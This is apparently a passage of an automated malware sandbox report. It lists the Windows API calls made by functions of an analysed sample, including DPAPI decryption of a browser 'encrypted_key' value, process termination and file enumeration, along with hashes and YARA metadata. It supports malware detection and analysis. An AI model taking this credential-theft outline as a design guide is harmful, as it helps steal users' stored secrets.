                                    • Part of subcall function 00E499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E49A11
                                    • Part of subcall function 00E499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E49A31
                                    • Part of subcall function 00E499C0: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E49A5A
                                    • Part of subcall function 00E499C0: LocalFree.KERNEL32(00E4148F), ref: 00E49A90
                                    • Part of subcall function 00E499C0: CloseHandle.KERNEL32(000000FF), ref: 00E49A9A
                                    • Part of subcall function 00E58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E49D39
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                    • Part of subcall function 00E49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                    • Part of subcall function 00E49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                    • Part of subcall function 00E49AC0: LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                    • Part of subcall function 00E49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B84
                                    • Part of subcall function 00E49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49BA3
                                    • Part of subcall function 00E49B60: LocalFree.KERNEL32(?), ref: 00E49BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: a768bb1c0aba9fb58ce9c8eb62675aa7454c1fb2a819d1ca7168b31be86593c3
                                  • Instruction ID: 3bc492d923f7f4eb4b2601d7348d3b5d1cbca8ff5f5b139776e2330b85860f70
                                  • Opcode Fuzzy Hash: a768bb1c0aba9fb58ce9c8eb62675aa7454c1fb2a819d1ca7168b31be86593c3
                                  • Instruction Fuzzy Hash: 593132B6D10209ABCF14DFE4ED85AEFB7B8BF48304F145559E905B7242EB349A04CBA1
                                  Function 00E594D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00E594EB
                                    • Part of subcall function 00E58D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E5951E,00000000), ref: 00E58D5B
                                    • Part of subcall function 00E58D50: RtlAllocateHeap.NTDLL(00000000), ref: 00E58D62
                                    • Part of subcall function 00E58D50: wsprintfW.USER32 ref: 00E58D78
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00E595AB
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E595C9
                                  • CloseHandle.KERNEL32(00000000), ref: 00E595D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 47176acb610448a1ee26232607143d4efa23797e64b24cf31a3b6f52bc424276
                                  • Instruction ID: f8402ee912c12779a76614cecb08667c5d2e63cd4f725521f534a00f7c33e5f4
                                  • Opcode Fuzzy Hash: 47176acb610448a1ee26232607143d4efa23797e64b24cf31a3b6f52bc424276
                                  • Instruction Fuzzy Hash: 78313E71E00208DFDB14DBD0CD49BEDB7B8FB44301F104559E906AB589EB799A89CB51
                                  Function 00E5C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00E5C74E
                                    • Part of subcall function 00E5BF9F: __amsg_exit.LIBCMT ref: 00E5BFAF
                                  • __getptd.LIBCMT ref: 00E5C765
                                  • __amsg_exit.LIBCMT ref: 00E5C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00E5C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 6b523b54ff9451acb484281174116a72d6695eee5196930001e0e9327ea9ab95
                                  • Instruction ID: 1f06d7bd17b8396191adaa47c6a36ab57ece2094abc66cf904b29ff67484f9aa
                                  • Opcode Fuzzy Hash: 6b523b54ff9451acb484281174116a72d6695eee5196930001e0e9327ea9ab95
                                  • Instruction Fuzzy Hash: D2F09032A007109FD720BBB85C0674A33E06F04767F38694AFC14B65D2DB6459889E66
                                  Function 00E54F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E54F7A
                                  • lstrcat.KERNEL32(?,00E61070), ref: 00E54F97
                                  • lstrcat.KERNEL32(?,01CB98E0), ref: 00E54FAB
                                  • lstrcat.KERNEL32(?,00E61074), ref: 00E54FBD
                                    • Part of subcall function 00E54910: wsprintfA.USER32 ref: 00E5492C
                                    • Part of subcall function 00E54910: FindFirstFileA.KERNEL32(?,?), ref: 00E54943
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FDC), ref: 00E54971
                                    • Part of subcall function 00E54910: StrCmpCA.SHLWAPI(?,00E60FE0), ref: 00E54987
                                    • Part of subcall function 00E54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54B7D
                                    • Part of subcall function 00E54910: FindClose.KERNEL32(000000FF), ref: 00E54B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 050fc495dfba3ba6762f9279f713897a26709b7692211042143276dc13ff6ead
                                  • Instruction ID: 1225150ab174e6a42c49fd3b2684af95ada6a0753c3d2c7080e9bc2945c51569
                                  • Opcode Fuzzy Hash: 050fc495dfba3ba6762f9279f713897a26709b7692211042143276dc13ff6ead
                                  • Instruction Fuzzy Hash: B121CD76A04204E7CB64F770EC46EED337CA754300F005595B6C963585EE7996CCCBA1